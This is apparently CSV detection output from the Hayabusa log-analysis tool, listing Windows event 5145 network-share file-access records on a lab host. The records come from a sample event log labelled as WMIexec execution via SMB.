2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
